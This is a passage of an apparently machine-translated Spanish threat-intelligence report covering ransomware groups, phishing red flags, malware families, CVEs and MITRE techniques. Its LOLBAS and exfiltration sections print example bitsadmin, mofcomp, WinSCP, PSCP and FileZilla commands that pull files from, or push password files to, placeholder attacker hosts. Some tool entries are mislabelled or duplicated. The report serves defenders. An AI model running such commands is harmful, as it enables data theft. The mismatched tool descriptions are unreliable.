A medida que mejore el software de alteración de voz de voz profunda y de IA generativa, es probable que estas herramientas se utilicen con más frecuencia en un número creciente de ataques dirigidos. Si desea obtener más información sobre las falsificaciones profundas, incluidas las medidas de mitigación que puede utilizar para ayudar a proteger su organización, puede descargar nuestro libro blanco sobre falsificaciones profundas aquí, o escuchar nuestro debate completo con Shiladitya Sircar en el podcast Unsupervised Learning.

Si cree que ha sido víctima de una estafa deepfake, puede presentar una denuncia ante el Centro de Denuncias de Delitos en Internet del FBI en www.ic3.gov.

Las fuerzas del orden en primer plano

BlackBerry trabaja con las fuerzas de seguridad de todo el mundo para mejorar la colaboración público-privada en materia de ciberseguridad. A partir del informe Global Threat Intelligence Report de septiembre de 2024, BlackBerry ha empezado a colaborar con el Centro Nacional de Coordinación contra la Ciberdelincuencia (NC3) de la Real Policía Montada de Canadá para compartir información. La siguiente información ha sido proporcionada por el NC3 para destacar las tendencias de la ciberdelincuencia desde la perspectiva de las fuerzas del orden.
Las fuerzas del orden en primer plano

Antecedentes históricos: El auge de los grupos de ransomware

El ecosistema del ransomware ha evolucionado significativamente desde el primer ataque registrado en 1989, cuando se lanzó el troyano del SIDA. La evolución del ransomware fue gradual antes de la aparición de las criptomonedas en 2010. Sin embargo, la era Bitcoin ha impulsado un rápido crecimiento de las ciberamenazas, especialmente en la última media década.

En 2019, grupos como MAZE, Ryuk y Sodinokibi/REvil causaban estragos cifrando sistemas y redes informáticas y exigiendo pagos por las claves de descifrado. Esta era una estrategia de ataque efectiva en ese momento porque pocas organizaciones mantenían copias de seguridad de los sistemas y aún menos tenían planes de respuesta a incidentes cibernéticos.

 

La amenaza del ransomware, en constante evolución

Durante este tiempo, las operaciones de ransomware se veían de forma muy parecida a los grupos tradicionales de delincuencia organizada: ciberdelincuentes expertos que se unen por una causa o propósito común. Desde entonces, los grupos de ransomware se han convertido en adversarios muy adaptables y, a medida que han mejorado las prácticas de ciberseguridad, también lo han hecho las tácticas, técnicas y procedimientos (TTP) de los operadores de ransomware.

Para asegurarse un beneficio económico, los grupos de ransomware pasaron de la extorsión simple (sólo cifrado de datos) a la táctica de la doble extorsión, exigiendo el pago de un rescate por la clave de descifrado y, además, para evitar que los datos robados se vendan en la web oscura.

El número de operaciones de ransomware también ha aumentado constantemente, con el cambio de marca de antiguos grupos, la entrada de otros nuevos en el ecosistema y la aparición de nuevos modelos de negocio. El ransomware como servicio (RaaS), así como métodos de cifrado más rápidos, mejores técnicas de ofuscación y la capacidad de atacar múltiples sistemas operativos, son algunos de los avances notables de los últimos años.

Mientras que algunas operaciones de ransomware siguen cifrando archivos y sistemas, otras han optado por renunciar a este paso y pasar a un modelo basado únicamente en la exfiltración. Es probable que este cambio de enfoque responda a la adopción de mejores prácticas de ciberseguridad y al mayor uso de copias de seguridad de los sistemas y servicios de recuperación ante desastres.

Un tercer elemento de la extorsión

Más recientemente, las operaciones de ransomware han añadido un tercer elemento de extorsión. En lugar de limitarse a extraer datos y amenazar con publicarlos en Internet, algunas operaciones de ransomware se están tomando el tiempo necesario para analizar los datos robados y utilizarlos como arma para aumentar la presión sobre las víctimas que se niegan a pagar. Esta estrategia puede consistir en compartir los datos de contacto o denunciar a los miembros de la familia de los directores ejecutivos y propietarios de empresas, así como amenazar con denunciar a las autoridades cualquier información sobre actividades empresariales ilegales descubierta en los datos robados. Los operadores del ransomware pueden amenazar con ponerse en contacto con clientes o, lo que es peor, lanzar nuevos ataques si no se satisfacen las peticiones de rescate.

Además, el NC3 ha visto surgir un número considerable de nuevas variantes de ransomware. El ecosistema del ransomware parece estar formado por grupos heterogéneos de individuos con habilidades que van desde la ingeniería social, la intermediación de acceso inicial, el cifrado avanzado, el desarrollo de malware, la negociación e incluso las relaciones públicas. El ecosistema del ransomware es una complicada red interconectada. Combatir las operaciones de ransomware requiere un enfoque igualmente complejo y multidisciplinar.

Retos policiales

Para las fuerzas de seguridad, la continua evolución del ransomware representa un reto considerable que requiere soluciones innovadoras. El ransomware es una de las principales amenazas mundiales, y es probable que persista mientras las víctimas sigan pagando.

Gracias a las anteriores medidas enérgicas de las fuerzas de seguridad contra grupos de ransomware de alto perfil como Hive, BlackCat y LockBit, sabemos que los actores del ransomware pueden adaptar rápidamente sus tácticas para frustrar los esfuerzos de las fuerzas de seguridad. Estos esfuerzos de adaptación han fragmentado el ecosistema del ransomware, obligando a las fuerzas de seguridad a adoptar estrategias polifacéticas que incluyen métodos creativos para interrumpir las operaciones (por ejemplo, atacar la infraestructura, la reputación y la confianza).

Las 10 principales amenazas canadienses de ransomware

El NC3 colabora estrechamente con las fuerzas del orden nacionales e internacionales, los socios gubernamentales, la industria privada y el mundo académico para mejorar continuamente la respuesta de las fuerzas del orden canadienses a la ciberdelincuencia. Además de contribuir y apoyar operaciones específicas de represión de la ciberdelincuencia, el Centro Nacional de Coordinación de la Ciberdelincuencia supervisa sistemáticamente la evolución del panorama de las ciberamenazas y lleva a cabo una evaluación trienal de los operadores de ransomware dirigidos contra Canadá. Esta evaluación sistemática informa al sector de la ciberseguridad de los cambios en el ecosistema de la ciberdelincuencia y ayuda a orientar los recursos de investigación.

En la tabla siguiente se hace un seguimiento de las amenazas de ransomware más frecuentes en Canadá durante el periodo de notificación de mayo a agosto de 2024, que coincide con el periodo que abarca este informe.

Figura 8: Amenazas canadienses de ransomware, mayo - agosto de 2024.
Figura 8: Amenazas canadienses de ransomware, mayo - agosto de 2024.

Grupo emergente destacado - Lynx Ransomware

El grupo de ransomware Lynx apareció por primera vez en el panorama de amenazas en julio de 2024 y rápidamente acumuló más de 25 víctimas durante los meses siguientes. Las organizaciones atacadas pertenecían a una amplia gama de sectores y estaban ubicadas principalmente en Norteamérica y Europa.

¿Qué es el Grupo Lynx?

El grupo Lynx, al igual que muchos operadores de ransomware actuales, utiliza una estrategia de doble extorsión. Tras acceder ilegalmente a un sistema o red, primero exfiltran los datos sensibles antes de cifrarlos, haciéndolos inaccesibles para el propietario. A continuación, amenazan con hacer públicos los datos si no se paga el rescate. Cuando una organización sufre un ataque de Lynx, el grupo publica un blog en un sitio de filtraciones -accesible a través de la Internet pública o la web oscura, o a veces ambas- "nombrando y avergonzando" a la víctima.

Figura 9: Captura de pantalla del sitio de filtraciones Lynx dark web.
Figura 9: Captura de pantalla del sitio de filtraciones Lynx dark web.
Los datos robados pueden ser aprovechados por el grupo en las negociaciones de rescate, con la amenaza de publicar más información si la víctima no cumple con las demandas de rescate adicionales.

Industrias y regiones objetivo de Lynx

En las imágenes siguientes puede ver las áreas e industrias en las que Lynx es más frecuente. Lynx se dirige principalmente a organizaciones norteamericanas y australianas, pero también al Reino Unido y partes de Europa.
Industrias y regiones objetivo de Lynx
Figura 10: Distribución geográfica de las víctimas de Lynx.
Figura 11: Industrias clave a las que se dirige Lynx.

Cómo funciona Lynx

Lynx mantiene tanto un sitio web de superficie como un sitio de filtraciones en la web profunda, junto con una serie de sitios espejo ubicados en direcciones ".onion", presumiblemente para garantizar el tiempo de actividad en caso de que alguno de sus sitios sea desconectado por las fuerzas de seguridad. También utilizan su propio cifrador que, tras un examen más detallado por parte de los investigadores de BlackBerry, parece haber sido desarrollado a partir del mismo código base que el utilizado por el infame grupo INC Ransom.

Hasta la fecha, se han identificado en la naturaleza un puñado de muestras relacionadas con el cifrador utilizado por el grupo Lynx. Todas las muestras parecen estar escritas en C++ y carecen de cualquier forma de empaquetado u ofuscación que impida su análisis.

Una vez realizados los objetivos previos al cifrado, como la obtención del acceso inicial y la exfiltración de datos, el ransomware se despliega en el entorno de la víctima. El propio ransomware está diseñado para ejecutarse a través de la consola de línea de comandos y admite varios argumentos opcionales. Esto permite a un atacante personalizar su enfoque para el cifrado de archivos para lograr sus objetivos.

Una vez ejecutado, el malware dispone de un modo "--verbose" que imprime una lista de las operaciones que el ransomware está llevando a cabo mientras se ejecuta de forma dinámica.

Cómo funciona Lynx
Figura 12: Encriptador Lynx funcionando en modo verbose.

Para evitar que el dispositivo de la víctima quede inoperativo, el malware omite ciertos tipos de archivos y carpetas de Windows del cifrado. Esto tiene un doble propósito: acelerar el cifrado y evitar que los programas críticos de Windows se vuelvan inaccesibles, lo que "bloquearía" el dispositivo y arruinaría la oportunidad del grupo de pedir un rescate.

Para un análisis más detallado de esta amenaza emergente, lea nuestro informe completo sobre Lynx.

Medidas de seguridad operativa

La formación periódica en materia de seguridad es vital para cultivar una cultura organizativa vigilante. Hay que hacer hincapié en temas como la prevención de la suplantación de identidad, la seguridad de las credenciales y la seguridad del acceso remoto.

  • Táctica: Implemente un programa de formación "Detecte la bandera roja" en el que los empleados reciban correos electrónicos de phishing simulados que contengan elementos engañosos comunes, seguidos de comentarios educativos inmediatos que expliquen cada indicador sospechoso. Realice un seguimiento de los índices de respuesta de los empleados y ofrezca formación de seguimiento específica en función de las métricas de rendimiento individuales.
  • Ejemplo: Un minorista internacional reduce significativamente sus incidentes de phishing poniendo en marcha un completo programa de formación junto con un sólido sistema de gestión de parches para abordar las vulnerabilidades con prontitud.
  • Basta con que un empleado haga clic en un enlace malicioso para poner en peligro los sistemas y la infraestructura de una organización. Aquí tienes un ejemplo de mensaje de phishing para incorporar a tu formación.
Figura 13a: Típica solicitud de conexión que puede recibir un empleado.
Figura 13a: Típica solicitud de conexión que puede recibir un empleado.
Sin embargo, una mirada más atenta revela los rasgos típicos de un correo electrónico de phishing (Figura 13b):
Figura 13b: Banderas rojas a tener en cuenta en un correo electrónico de phishing.
Figura 13b: Banderas rojas a tener en cuenta en un correo electrónico de phishing.
  1. La dirección de correo electrónico del remitente afirma ser de "linkedincdn.com" en lugar del dominio oficial LinkedIn.com: se trata de una técnica clásica de suplantación de dominio.
  2. Hay un cartel de advertencia que indica que se trata de una fuente externa. Se trata de una útil función de seguridad que muchas organizaciones deciden implantar.
  3. El mensaje utiliza dos tácticas clásicas de ingeniería social. Afirma provenir de un ejecutivo de alto nivel (CISO) de la organización de destino y utiliza la adulación ("he oído hablar muy bien de ti") para fomentar la participación.
  4. La copia contiene un formato incoherente: se pueden encontrar irregularidades ortográficas y gramaticales por todas partes.
  5. Aunque la foto de perfil hace que parezca auténtica, cualquiera que sepa hacer clic con el botón derecho y seleccionar "Guardar imagen como" puede copiarlas fácilmente de un perfil legítimo.
  6. El aspecto general del correo electrónico imita los mensajes automatizados que suelen enviar las redes sociales a los usuarios.
    • Es probable que los botones "Aceptar" y "Ver perfil" sean enlaces maliciosos que podrían llevar a páginas de recogida de credenciales o descargas de malware.
    • El enlace "Cancelar suscripción" de la parte inferior también puede ser malicioso. Los phishers suelen incluir estos enlaces para aparentar legitimidad, pero en realidad conducen a los usuarios a contenidos más dañinos.

Ayude a sus empleados a aprender a:

  • Verifique cuidadosamente los dominios de correo electrónico del remitente.
  • Desconfíe de las solicitudes de conexión no solicitadas, sobre todo de altos ejecutivos.
  • Nunca haga clic en botones o enlaces de correos electrónicos sospechosos; en su lugar, visite el sitio al que se hace referencia escribiendo la URL directamente en su navegador.
  • Presta atención a las advertencias de seguridad de su sistema de correo electrónico.
  • Desconfíe de la adulación o la urgencia en las solicitudes inesperadas de contactos profesionales.

Los ciberdelincuentes perfeccionan continuamente sus ciberataques para aumentar su impacto. Para defenderse de estas amenazas en constante evolución, las organizaciones deben adoptar un enfoque con visión de futuro de las estrategias de defensa de la ciberseguridad. Eso incluye invertir estratégicamente en tecnologías -como la supervisión de la seguridad, la formación del personal y la respuesta a incidentes- para asegurarse de que están preparadas para ciberamenazas sofisticadas.

Ciberhistoria destacada: El troyano bancario Coyote apunta a Latinoamérica y se centra en las instituciones financieras brasileñas

En julio de 2024, investigadores de BlackBerry descubrieron una campaña en la que Coyote se desplegaba para atacar bancos brasileños y bolsas de criptomonedas. La creciente tendencia de los troyanos bancarios geolocalizados subraya la necesidad de una ciberseguridad sólida y de la educación de los usuarios para combatir las amenazas de phishing e ingeniería social como Coyote. En la sección Mitigación de este informe, encontrará ideas de seguridad adicionales que podrá compartir con su organización.

CylanceMDR: Amenazas y mitigaciones

Las organizaciones se enfrentan a amenazas no solo del malware de los actores de amenazas, sino también del uso indebido de herramientas legítimas. Esta sección destaca las amenazas más frecuentes que el equipo de CylanceMDR™ ha encontrado en entornos de red de clientes este trimestre, así como las mitigaciones que las organizaciones pueden utilizar para reforzar sus ciberdefensas.

CylanceMDR es nuestro servicio MDR basado en suscripción que proporciona supervisión 24x7 y ayuda a las organizaciones a detener ciberamenazas sofisticadas colmando las lagunas de los entornos de seguridad.

Actividad de LOLBAS

Actividad de LOLBAS

LOLBAS se refiere a las herramientas integradas en el sistema Windows y a los ejecutables legítimos que los atacantes pueden utilizar con fines maliciosos. El término "vivir del terreno" significa utilizar herramientas que ya están presentes en el entorno objetivo ("el terreno"), en lugar de arriesgarse a introducir nuevo malware que pueda activar los sistemas de seguridad y alertar al objetivo de que ha sido comprometido. El peligro de los ataques basados en LOLBAS reside en su capacidad para eludir los controles de seguridad, ya que utilizan herramientas legítimas del sistema. Esto dificulta su detección, ya que las actividades del sistema pueden parecer normales a primera vista.

Durante el periodo cubierto por este informe, se observó la siguiente actividad de LOLBAS:

  • Bitsadmin sigue siendo el LOLBAS más observado.
  • Certutil es el segundo más observado, aunque su uso ha disminuido desde el último periodo de notificación.
  • También se han observado Regsvr32, MSHTA y PsExec, pero representan un bajo porcentaje de la actividad global.

A continuación, ilustramos un ejemplo de uso malicioso de LOLBAS.

Figura 14: Actividad de LOLBAS, julio - septiembre de 2024.

Archivo: Bitsadmin.exe

MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest

Archivo: mofcomp.exe

MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Herramientas de exfiltración

Herramientas de exfiltración

Las herramientas de exfiltración son software utilizado para transferir datos fuera de un entorno de destino, a menudo con fines maliciosos. Este trimestre, el equipo de CylanceMDR revisó las herramientas más frecuentes que podrían utilizarse para la exfiltración (sin incluir las herramientas RMM) en los entornos de nuestros clientes.

Figura 15: Porcentaje de herramientas de exfiltración de las que se ha abusado, julio - septiembre de 2024.

WinSCP

Descripción: WinSCP es un cliente de transferencia de archivos; PuTTY es un cliente de shell seguro (SSH).

Ejemplo de línea de comandos: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /cargar contraseñas.txt /defaults=auto

Nota: Comúnmente utilizado con una interfaz gráfica de usuario (GUI).

INGLETE ATT&CK ID: T1048

PSCP

Descripción: PuTTY Secure Copy Protocol (PSCP) es una utilidad de línea de comandos utilizada para transferir archivos y carpetas.

Ejemplo de línea de comandos: pscp.exe -P 22 C:\Finanzas.txt root[at]EvilDomain/tmp

INGLETE ATT&CK ID: T1021.004

FileZilla

Descripción: FileZilla es una conocida herramienta de protocolo de transferencia de archivos (FTP) que puede utilizarse en varios sistemas operativos.

Ejemplo de línea de comandos: filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /directorio_remoto/pass.txt"

INGLETE ATT&CK ID: T1071.002

FreeFileSync

Descripción: PuTTY Secure Copy Protocol (PSCP) es una utilidad de línea de comandos utilizada para transferir archivos y carpetas.

Ejemplo de línea de comandos: pscp.exe -P 22 C:\Finanzas.txt root[at]EvilDomain/tmp

INGLETE ATT&CK ID: T1021.004

Rclone

Descripción: FreeFileSync es una herramienta de sincronización que se puede utilizar para gestionar copias de seguridad.

Ejemplo de línea de comandos: FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

INGLETE ATT&CK ID: T1567.002

Herramientas de supervisión y gestión a distancia

Herramientas de supervisión y gestión a distancia

Los actores de amenazas abusan de las herramientas RMM. Estas herramientas proporcionan a los agresores una forma fácil de mantener un acceso persistente y sencillo a los sistemas y un medio eficaz de exfiltración de datos. Como señalamos en nuestro anterior Informe Global de Inteligencia sobre Amenazas, esta es la categoría de más rápido crecimiento para los grupos de ransomware que utilizan estas herramientas para exfiltrar datos de los entornos de las víctimas. Durante este período, el equipo de CylanceMDR revisó las herramientas RMM más comúnmente explotadas en los entornos de nuestros clientes.

Durante nuestro análisis, observamos que muchos clientes utilizan varias herramientas RMM en sus entornos, lo que aumenta la superficie de ataque y el riesgo de su organización.

Figura 16: Este gráfico ilustra el porcentaje de ataques ejecutados abusando de las principales herramientas RMM.

 

Las mitigaciones sugeridas incluyen:

1. Auditoría de herramientas de acceso remoto

  • Identificar las herramientas RMM utilizadas actualmente en la organización.
  • Confirmar que están aprobados en el entorno.
  • Si utiliza varias herramientas RMM, determine si pueden consolidarse. Reducir el número de herramientas diferentes utilizadas reduce el riesgo.

2. Desactivar puertos y protocolos

  • Bloquee la comunicación de red entrante y saliente a puertos de uso común asociados con herramientas de acceso remoto no aprobadas.
  • Utilice reglas predeterminadas de denegación y listas de permisos en lugar de un enfoque de lista de bloqueo cuando se trate de reglas de cortafuegos y control de aplicaciones.

3. Supervisar la actividad de los terminales y el tráfico de red

  • Detectar el uso anormal de herramientas de acceso remoto.

4. Parcheado

  • Garantizar la revisión periódica de las vulnerabilidades asociadas a las herramientas RMM permitidas utilizadas, actualizándolas en caso necesario.
  • Dé prioridad a los sistemas accesibles a través de Internet a la hora de realizar ciclos regulares de parches.

5. Segmentación de la red

  • Minimice los movimientos laterales malintencionados segmentando la red y limitando el acceso a dispositivos y datos.

6. Etiquetado de dispositivos

  • Averigüe si su proveedor de seguridad ofrece opciones para etiquetar los dispositivos que utilizan herramientas RMM. Si es así, habilítelo para garantizar la visibilidad de su SOC. Algunos proveedores ofrecen opciones para dejar una nota/etiqueta que identifique las herramientas/actividades aprobadas, lo que ayuda enormemente a los analistas durante las investigaciones.

7. RMM de carga de memoria

  • Utilice software de seguridad que pueda detectar accesos remotos que sólo se cargan en la memoria.

CylanceMDR Principales amenazas trimestrales

A continuación se enumeran las amenazas más frecuentes detectadas y a las que ha respondido el equipo de analistas de CylanceMDR durante el periodo cubierto por este informe.
Figura 17: Amenazas más frecuentes detectadas y respondidas por el equipo de analistas de CylanceMDR este trimestre.
Figura 17: Amenazas más frecuentes detectadas y respondidas por el equipo de analistas de CylanceMDR este trimestre.

Destacado: Alertas del equipo de respuesta a incidentes de BlackBerry

Elequipo de Respuesta a Incidentes (IR) de BlackBerry de proporciona mitigación a las organizaciones que han sufrido un ataque de malware o una sospecha de violación de datos. Durante este trimestre, nuestro equipo de IR ha sido testigo de un aumento de los ataques relacionados con servicios conectados a Internet y el uso indebido de credenciales de antiguos empleados.

Los dispositivos orientados a Internet, como los dispositivos VPN, fueron objeto de más ataques de lo habitual este trimestre. Por desgracia, este tipo de dispositivos puede no estar suficientemente protegido con autenticación multifactor. En algunos casos, esta falta de MFA ha permitido a los actores de amenazas desplegar ransomware u otro malware en el entorno de un cliente y filtrar datos de la empresa. Esto pone de relieve la necesidad de que las empresas protejan adecuadamente todos los sistemas expuestos a Internet en el momento oportuno(MITRE - External Remote Services) y reduzcan la superficie de ataque cuando sea posible, utilizando alternativas modernas como las soluciones Zero Trust Network Access (ZTNA).

El uso indebido de las credenciales de cuentas de antiguos empleados es otro de los exploits más comunes. Aunque las credenciales de los empleados deberían ser desprovisionadas tan pronto como el trabajador abandona la empresa, esto no siempre ocurre. Las cuentas antiguas pueden, potencialmente, dar a un actor de amenaza acceso completo a la red y los sistemas de la organización. Esto subraya la necesidad de que las empresas apliquen fuertes controles de seguridad de autenticación en todos los sistemas(MITRE - Cuentas válidas).

Vulnerabilidades y exposiciones comunes

Impacto y estadísticas

El sistema Common Vulnerabilities and Exposures (CVEs) ofrece un marco para identificar, normalizar y hacer públicas las vulnerabilidades y exposiciones de seguridad conocidas. De julio a septiembre de 2024, el Instituto Nacional de Estándares y Tecnología (NIST) informó de 8.659 nuevas CVE.

Aunque este trimestre se descubrieron menos CVE en comparación con el anterior, el nivel de criticidad de estos CVE ha aumentado significativamente. El trimestre pasado, el 8% de las CVE tenían una puntuación de gravedad igual o superior a 9,0, mientras que este trimestre el porcentaje aumentó hasta un nuevo máximo del 14%.

Figura 18: Puntuación CVE julio - septiembre 2024.

Los CVE más críticos registrados este trimestre:

CVE-2024-4879 (9.3 Crítico) Ejecución arbitraria de código: Esta vulnerabilidad de ServiceNow permite a usuarios no autenticados ejecutar código de forma remota dentro de la plataforma Now. Se trata de una vulnerabilidad de inyección de plantillas Jelly queexplota las macros de interfaz de usuario de ServiceNow. Esta vulnerabilidad puede encadenarse potencialmente con CVE-2024-5178 (6.9 Medio) Acceso no autorizado y CVE-2024-5217 (9.2 Crítico) Ejecución de código arbitrario, permitiendo la ejecución remota no autorizada de código en los servidores MID de ServiceNow.

CVE-2024-43491 (9.8 Critical) Ejecución arbitraria de código: Perteneciente al Service Stack de Microsoft, esta vulnerabilidad reintroduce vulnerabilidades previamente mitigadas en Windows 10. Permite la ejecución remota de código sin la interacción del usuario, lo que podría comprometer todo el sistema. Se han publicado tanto una actualización de Service Stack como una actualización de seguridad de Windows para parchear esta vulnerabilidad.

CVE-2024-38194 (9.9 Crítico) Anulación de autenticación: Esta vulnerabilidad surge de una autorización inadecuada dentro de las aplicaciones web de Azure, permitiendo a un atacante autenticado elevar privilegios a través de una red. Si se explota, podría comprometer la seguridad de las aplicaciones y los sistemas conectados, lo que provocaría el acceso no autorizado a los datos, la interrupción del servicio o la modificación maliciosa del comportamiento de las aplicaciones.

CVE-2024-21416 (9.8 Crítico) Ejecución arbitraria de código: En relación con una vulnerabilidad de ejecución remota de código (RCE) de TCP/IP de Windows, esta explotación podría permitir a los atacantes ejecutar código arbitrario en el sistema de destino, pudiendo obtener acceso completo.

CVE-2024-47575 (9.8 Crítico) Anulación de autenticación: Revelado justo fuera del período de notificación, el exploit conocido como "FortiJump" y rastreado como CVE-2024-47575 implica ataques de día cero por parte del recientemente revelado actor de amenazas UNC5820. Abusa de un fallo para ejecutar comandos API, permitiendo a los atacantes saltarse la autenticación y ejecutar comandos en sistemas explotables. El aviso de Fortinet de octubre afirmaba que esta vulnerabilidad "puede permitir a un atacante remoto no autenticado ejecutar código o comandos arbitrarios a través de peticiones especialmente diseñadas."

Amenazas más frecuentes por plataforma: Windows

FakeUpdates/SocGholish

Descargador

Descargador basado en JavaScript que presenta falsas actualizaciones del navegador a los usuarios. Se sabe que descarga cargas útiles adicionales como AZORult, GootLoader y RedLine.

Formbook/xLoader

Infostealer    

Sofisticado malware que opera como infostealer y downloader. Emplea técnicas anti-VM, inyección de procesos y rutinas de cifrado personalizadas para eludir las defensas de ciberseguridad. Roba datos de navegadores, clientes de correo electrónico y diversas aplicaciones.

QakBot

Botnet/Dropper

Descubierto por primera vez en 2008, ahora en la versión 5.0. Proporciona amplias capacidades para la filtración de datos y el movimiento lateral. Se sabe que entrega múltiples tipos de malware después de la instalación.

Agente Tesla

Infostealer

Infostealer basado en .NET vendido como MaaS utilizado principalmente para la recolección de credenciales. A pesar de que el FBI y el Departamento de Justicia desmantelaron la infraestructura en 2023, ha resurgido con nuevos mecanismos de persistencia para sobrevivir a la restauración del host.

njRAT

Troyano de acceso remoto

RAT se centraba en capturar datos de usuarios, con capacidades que incluían el acceso a cámaras, el robo de credenciales, la supervisión de la interacción con archivos y el registro de pulsaciones de teclas.

AsyncRAT

Troyano de acceso remoto

Suele distribuirse junto con otros programas maliciosos. Recibe comandos del servidor C2 para capturar datos del usuario y terminar procesos específicos. Dispone de funciones de botnet.

LummaC2

Infostealer

Infostealer basado en C dirigido a empresas comerciales y organizaciones de infraestructuras críticas. Se centra en la filtración de datos confidenciales y se distribuye a través de foros clandestinos y grupos de Telegram.

Remcos

Troyano de acceso remoto

Aplicación de control remoto y vigilancia diseñada para el acceso remoto no autorizado y el control de dispositivos.

RedLine

Infostealer

Utiliza varias aplicaciones y servicios para filtrar datos de las víctimas, como información sobre tarjetas de crédito, contraseñas y cookies.

Phorpiex

Botnet

Botnet centrada en la distribución de malware, conocida por su participación en campañas de extorsión de tipo X.

Amenazas más frecuentes por plataforma: Linux

Mirai

Botnet

Sigue siendo muy activo, y la última versión explota vulnerabilidades de día cero en cámaras de CCTV. La variante "Corona" se propaga mediante la inyección de código malicioso en cámaras comprometidas.

Gafgyt/Bashlite

Botnet

Botnet Linux centrada en IoT que utiliza servidores C2 para ataques DDoS a gran escala. La última versión se centra en contraseñas SSH débiles para el minado de criptomonedas en GPU.

Reproducir ransomware

ransomware

Nueva variante dirigida específicamente a entornos ESXi, marcando la primera expansión del grupo a sistemas Linux desde sus anteriores ataques de doble extorsión centrados en Windows. Cifra archivos de forma selectiva en entornos Linux ESXi.

Hadooken

Botnet

Nuevo malware para Linux que combina capacidades de minería de criptomonedas con herramientas de ataque DDoS. Ataca vulnerabilidades de sistemas como Oracle WebLogic Server.

Amenazas más frecuentes por plataforma: macOS

Robo atómico (AMOS)

Infostealer

Nuevas variantes disfrazadas de varias aplicaciones distribuidas a través de imágenes de disco DMG. Los objetivos son contraseñas, cookies del navegador, datos de autorrelleno, monederos criptográficos y datos de llaveros de Mac.

Chtulu

Infostealer

Infostealer basado en MaaS distribuido como troyano DMG. Las actividades posteriores a la infección incluyen la recopilación de contraseñas de llaveros, cookies de navegador, información de cuentas de Telegram, carteras de criptomonedas y datos de usuario para cargarlos en el servidor C2.

Macma

Puerta trasera

Actualizaciones recientes atribuidas al grupo APT chino Evasive Panda. Establece persistencia antes de desplegar capacidades de keylogger y captura de medios para la exfiltración de datos a servidores C2.

TodoSwift

Descargador

Distribuido a través de señuelos PDF con precios en Bitcoin. Atribuido al grupo norcoreano BlueNoroff y capaz de descargar binarios maliciosos adicionales a través de conexiones con servidores C2.

Amenazas más frecuentes por plataforma: Android

Necro Troyano

Descargador

Se distribuye a través de Google Play Store y kits de desarrollo de software (SDK) maliciosos. Entre sus funciones se incluyen el lanzamiento de anuncios invisibles, la descarga de cargas útiles adicionales, la instalación de aplicaciones de terceros, la ejecución de código adicional y la comunicación con el servidor C2.

Pulpo2

Infostealer

Distribuido a través de versiones troyanizadas de NordVPN y Google Chrome. Una variante de Exobot que tiene como objetivo principal la información de cuentas bancarias con capacidades de acceso remoto y comunicación con servidores C2.

Ajina

Infostealer

Se distribuye mediante ingeniería social y phishing, especialmente a través de Telegram. Roba credenciales bancarias y datos de SMS para interceptar la autenticación 2FA de aplicaciones bancarias.

Técnicas comunes de MITRE

Comprender las técnicas de alto nivel de los grupos de amenazas puede ayudar a decidir qué técnicas de detección priorizar. BlackBerry observó las siguientes 20 técnicas utilizadas por los actores de amenazas en este periodo.

Figura 19: Las 20 principales técnicas observadas del MITRE, junio - septiembre de 2024.

Técnicas detectadas

La siguiente tabla muestra las 20 técnicas más utilizadas por los actores de amenazas este trimestre. Una flecha hacia arriba (↑) en la columna "Cambio" indica que el uso de la técnica ha aumentado desde nuestro último informe. Una flecha hacia abajo (↓) indica que el uso ha disminuido desde nuestro último informe. Un símbolo igual (=) indica que la técnica se mantiene en la misma posición que en nuestro último informe.

Nombre de la técnica Técnica ID Nombre de la táctica Último informe Cambia
Flujo de ejecución del secuestro
T1574
Persistencia, escalada de privilegios, evasión de defensas
1
=
Carga lateral de DLL
T1574.002
Persistencia, escalada de privilegios, evasión de defensas
2
=
Virtualización/
Evasión del Sandbox
T1497
Defensa Evasión, Descubrimiento
NA
Descubrimiento de información del sistema
T1082
Descubrimiento
5
Captura de entrada
T1056
Acceso a credenciales, recogida
4
Descubrimiento de software
T1518
Descubrimiento
6
=
Descubrimiento de software de seguridad
T1518.001
Descubrimiento
7
=
Tarea/trabajo programado
T1053
Ejecución, persistencia, escalada de privilegios
19
Secuestro de órdenes de búsqueda DLL
T1574.001
Persistencia, escalada de privilegios, evasión de defensas
NA
Inyección de procesos
T1055
Evasión de la defensa, escalada de privilegios
3
Enmascaramiento
T1036
Defensa Evasión
10
Descubrimiento de procesos
T1057
Descubrimiento
8
Crear o modificar un proceso del sistema
T1543
Persistencia, escalada de privilegios
NA
Servicio Windows
T1543.003
Persistencia, escalada de privilegios
NA
Ejecución de arranque o inicio de sesión automático
T1547
Persistencia, escalada de privilegios
14
Claves de ejecución del registro/Carpeta de inicio
T1547.001
Persistencia, escalada de privilegios
15
Descubrimiento de archivos y directorios
T1083
Descubrimiento
9
Descubrimiento remoto del sistema
T1018
Descubrimiento
13
Intérprete de comandos y secuencias de comandos
T1059
Ejecución
NA
Deteriorar las defensas
T1562
Defensa Evasión
17
Técnica ID
Flujo de ejecución del secuestro
T1574
Carga lateral de DLL
T1574.002
Virtualización/
Evasión del Sandbox
T1497
Descubrimiento de información del sistema
T1082
Captura de entrada
T1056
Descubrimiento de software
T1518
Descubrimiento de software de seguridad
T1518.001
Tarea/trabajo programado
T1053
Secuestro de órdenes de búsqueda DLL
T1574.001
Inyección de procesos
T1055
Enmascaramiento
T1036
Descubrimiento de procesos
T1057
Crear o modificar un proceso del sistema
T1543
Servicio Windows
T1543.003
Ejecución de arranque o inicio de sesión automático
T1547
Claves de ejecución del registro/Carpeta de inicio
T1547.001
Descubrimiento de archivos y directorios
T1083
Descubrimiento remoto del sistema
T1018
Intérprete de comandos y secuencias de comandos
T1059
Deteriorar las defensas
T1562
Nombre de la táctica
Flujo de ejecución del secuestro
Persistencia, escalada de privilegios, evasión de defensas
Carga lateral de DLL
Persistencia, escalada de privilegios, evasión de defensas
Virtualización/
Evasión del Sandbox
